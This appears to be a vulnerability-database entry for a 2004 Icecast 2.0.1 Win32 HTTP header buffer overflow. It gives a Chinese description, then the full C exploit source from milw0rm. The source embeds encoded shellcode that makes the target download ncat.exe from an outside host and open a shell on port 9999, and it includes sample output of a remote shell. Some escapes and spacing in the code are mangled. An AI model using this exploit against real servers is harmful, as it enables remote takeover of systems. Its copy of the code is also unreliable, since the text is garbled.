https://www.exploit-db.com/exploits/568
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-498

Icecast是一款免费开放源代码的音频流服务程序，可使用在多种Unix/Linux操作系统平台下，也可以使用在MicrosoftWindows操作系统下。Icecast对HTTP的头字段数据缺少充分检查，远程攻击者可以利用这个漏洞以服务进程权限在系统上执行任意指令。IcecastServer最多接收客户端带有32个头结构字段的HTTP请求，在某些环境下(Win32)第32头结构会覆盖函数的返回地址。也就是说攻击者可以使用普通的HTTP请求加上31头结构字段在加上SHELLCODE就可能不需要跳转/调用寄存器或地址或使用其他手段而在主机上执行任意指令。

/* 

by Luigi Auriemma 

Shellcode add-on by Delikon 
www.Delikon.de 

Because of all the forbidden bytes in a http get request 
i had to use a very small shellcode, which was blown up 
by Msf::Encoder::PexAlphaNum. Great encoder. 
------------------------------------------------------------------------- 
C:>iceexec 127.0.0.1 

Icecast <= 2.0.1 Win32 remote code execution 0.1 
by Luigi Auriemma 
e-mail: [email protected] 
web:http://aluigi.altervista.org 

shellcode add-on by Delikon 
www.delikon.de 

- target 127.0.0.1:8000 
- send malformed data 

Server IS vulnerable!!! 


C:>nc 127.0.0.1 9999 
Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 

C:Icecast2 Win32> 
--------------------------------------------------------------------------- 


*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 

#ifdef WIN32 
#pragma comment(lib, "ws2_32.lib") 
    #include <winsock.h> 
    #include "winerr.h" 

    #define close closesocket 
#else 
    #include <unistd.h> 
    #include <sys/socket.h> 
    #include <sys/types.h> 
    #include <arpa/inet.h> 
    #include <netdb.h> 
    #include <netinet/in.h> 
#endif 

#define VER "0.1" 
#define PORT 8000 
#define BUFFSZ2048 
#define TIMEOUT 3 
#define EXEC"GET / HTTP/1.0rn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "xcc" 
//web download and execution shellcode 
//which downloads http://www.elitehaven.net/ncat.exe 
//this ncat spwans a shell on port 9999 
char shellcode[] = "xEB" 
"x03x59xEBx05xE8xF8xFFxFFxFFx4Fx49x49x49x49x49x49x51x5Ax56x54" 
"x58x36x33x30x56x58x34x41x30x42x36x48x48x30x42x33x30x42x43x56" 
"x58x32x42x44x42x48x34x41x32x41x44x30x41x44x54x42x44x51x42x30" 
"x41x44x41x56x58x34x5Ax38x42x44x4Ax4Fx4Dx49x4Ex4Ex4Cx42x30x42" 
"x50x42x50x4Fx35x4Ax4Ex48x55x42x50x42x30x42x50x49x48x43x4Cx42" 
"x45x4Ax46x50x58x50x34x50x50x4Ex4Ex4Ax4Ex42x36x42x50x42x30x42" 
"x30x41x43x49x4Cx48x56x49x4Bx4Fx36x50x46x41x55x4Ax56x45x57x44" 
"x57x4Ex36x4Dx46x46x55x4Fx4Fx42x4Dx42x45x4Ax46x48x43x4Cx41x4F" 
"x32x42x57x4Ax4Ex48x44x42x50x42x30x42x30x41x43x49x4Cx41x55x41" 
"x35x4Dx48x47x53x48x55x4Dx38x47x47x4Ax50x48x35x41x35x4Fx4Fx42" 
"x4Dx43x55x4Ax56x4Ax59x50x4Fx4Cx38x50x30x4Ax4Ex4Dx32x42x50x42" 
"x30x42x30x41x55x47x35x4Fx4Fx42x4Dx41x53x49x4Cx49x34x44x4Ex50" 
"x4Fx43x35x4Ax46x50x37x4Ax4Dx44x4Ex43x47x4Ax4Ex49x41x42x30x42" 
"x50x42x30x4Fx4Fx42x4Dx45x55x48x55x46x46x41x4Ax42x53x42x30x42" 
"x30x42x30x4Bx48x42x44x4Ex30x4Bx58x42x37x4Ex51x4Dx4Ax4Bx48x4A" 
"x56x4Ax30x49x58x4Ax4Ex50x45x4Dx55x43x4Cx43x35x45x45x48x55x47" 
"x35x4Bx48x4Ex46x46x42x4Ax31x4Bx58x45x54x4Ex33x4Bx58x46x35x45" 
"x30x4Ax57x41x50x4Cx4Ex4Bx38x4Cx34x4Ax41x4Bx58x4Cx55x42x52x41" 
"x50x4Bx4Ex43x4Ex45x43x49x54x4Bx48x46x53x4Bx48x41x50x50x4Ex41" 
"x53x4Fx4Fx4Ex4Fx41x43x42x4Cx4Ex4Ax4Ax43x42x4Ex46x37x47x50x41" 
"x4Cx4Fx4Cx4Dx50x41x30x47x4Cx4Bx4Ex44x4Fx4Bx33x4Ex37x46x52x46" 
"x51x45x47x41x4Ex4Bx48x4Cx35x46x42x41x50x4Bx4Ex48x56x4Bx58x4E" 
"x50x4Bx44x4Bx58x4Cx55x4Ex31x41x30x4Bx4Ex4Bx48x46x50x4Bx58x41" 
"x30x4Ax4Ex49x4Ex44x30x42x50x42x50x42x50x41x53x42x4Cx49x58x4C" 
"x4Ex4Fx55x50x35x4Dx45x4Bx55x43x4Cx4Ax4Ex4Fx42x4Fx4Fx4Fx4Fx4F" 
"x4Fx4Dx36x4Ax46x4Ax56x50x52x45x56x4Ax57x45x46x42x30x4Ax56x46" 
"x47x46x57x42x57x4Cx43x4Fx42x4Fx32x47x47x47x47x47x47x50x42x45" 
"x36x4Ex56x49x36x46x57x45x56x4Ax36x41x36x48x57x45x36x50x56x50" 
"x32x50x46x45x36x46x47x4Fx42x50x46x43x36x41x56x46x37x50x32x45" 
"x36x4Ax37x45x46x42x50x5A"; 


/* 
in my example 0xcc is used to interrupt the code execution, you must 
put your shellcode exactly there. 
You don't need to call a shellcode offset (CALL ESP, JMP ESP and so 
on) or doing any other annoying operation because the code flow 
points directly there!!! 
Cool and easy 8-) 
*/ 


int startWinsock(void) 
{ 
  WSADATA wsa; 
  return WSAStartup(MAKEWORD(2,0),&wsa); 
} 

int timeout(int sock); 
u_long resolv(char *host); 
void std_err(void); 

int main(int argc, char *argv[]) { 
    structsockaddr_in peer; 
    int sd; 
    u_short port = PORT; 
    u_charbuff[BUFFSZ]; 
UCHAR buf[4096]; 
UCHAR *pointer=NULL; 


    setbuf(stdout, NULL); 

    fputs("n" 
        "Icecast <= 2.0.1 Win32 remote code execution "VER"n" 
        "by Luigi Auriemman" 
        "e-mail: [email protected]" 
        "web:http://aluigi.altervista.orgn" 
  "nshellcode add-on by Delikonn" 
  "www.delikon.de" 
        "n", stdout); 

    if(argc < 2) { 
        printf("nUsage: %s <server> [port(%d)]n" 
            "n" 
            "Note: This exploit will force the Icecast server to download NCATn" 
            "and after execution it will spwan a shell on 9999n" 
            "n", argv[0], PORT); 
        exit(1); 
    } 

#ifdef WIN32 

    startWinsock(); 
#endif 

    if(argc > 2) port = atoi(argv[2]); 

    peer.sin_addr.s_addr = resolv(argv[1]); 
    peer.sin_port= htons(port); 
    peer.sin_family= AF_INET; 

    memset(buf,0x00,sizeof(buf)); 
    strcpy(buf,EXEC); 
    
pointer =strrchr(buf,0xcc); 

strcpy(pointer,shellcode); 

strcat(buf,"rn"); 
strcat(buf,"rn"); 
    

    printf("n- target %s:%hun", 
        inet_ntoa(peer.sin_addr), port); 

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
    if(sd < 0) std_err(); 

    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) 
      < 0) std_err(); 

    fputs("- send malformed datan", stdout); 
    if(send(sd, buf, strlen(buf), 0) 
      < 0) std_err(); 

    if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) { 
        fputs("nServer IS vulnerable!!!nn", stdout); 
    } else { 
        fputs("nServer doesn't seem vulnerablenn", stdout); 
    } 

    close(sd); 
    return(0); 
} 

int timeout(int sock) { 
    structtimeval tout; 
    fd_setfd_read; 
    int err; 

    tout.tv_sec = TIMEOUT; 
    tout.tv_usec = 0; 
    FD_ZERO(&fd_read); 
    FD_SET(sock, &fd_read); 
    err = select(sock + 1, &fd_read, NULL, NULL, &tout); 
    if(err < 0) std_err(); 
    if(!err) return(-1); 
    return(0); 
} 

u_long resolv(char *host) { 
    structhostent *hp; 
    u_longhost_ip; 

    host_ip = inet_addr(host); 
    if(host_ip == INADDR_NONE) { 
        hp = gethostbyname(host); 
        if(!hp) { 
            printf("nError: Unable to resolve hostname (%s)n", host); 
            exit(1); 
        } else host_ip = *(u_long *)(hp->h_addr); 
    } 
    return(host_ip); 
} 

#ifndef WIN32 
    void std_err(void) { 
        perror("nError"); 
        exit(1); 
    } 
#endif 

// milw0rm.com [2004-10-06]

来源:XF
名称:icecast-http-bo(17538)
链接:http://xforce.iss.net/xforce/xfdb/17538
来源:BID
名称:11271
链接:http://www.securityfocus.com/bid/11271
来源:SECUNIA
名称:12666
链接:http://secunia.com/advisories/12666/
来源:www.securiteam.com
链接:http://www.securiteam.com/exploits/6X00315BFM.html
来源:BUGTRAQ
名称:20041002Re:2.CodeexecutioninIcecast2.0.1(exploitwithshellcode)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109674593230539&w;=2
来源:aluigi.altervista.org
链接:http://aluigi.altervista.org/adv/iceexec-adv.txt
来源:OSVDB
名称:10446
链接:http://www.osvdb.org/10446
来源:SECTRACK
名称:1011439
链接:http://securitytracker.com/id?1011439
来源:BUGTRAQ
名称:20040928CodeexecutioninIcecast2.0.1
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109640005127644&w;=2
来源：NSFOCUS
名称：6961
链接：http://www.nsfocus.net/vulndb/6961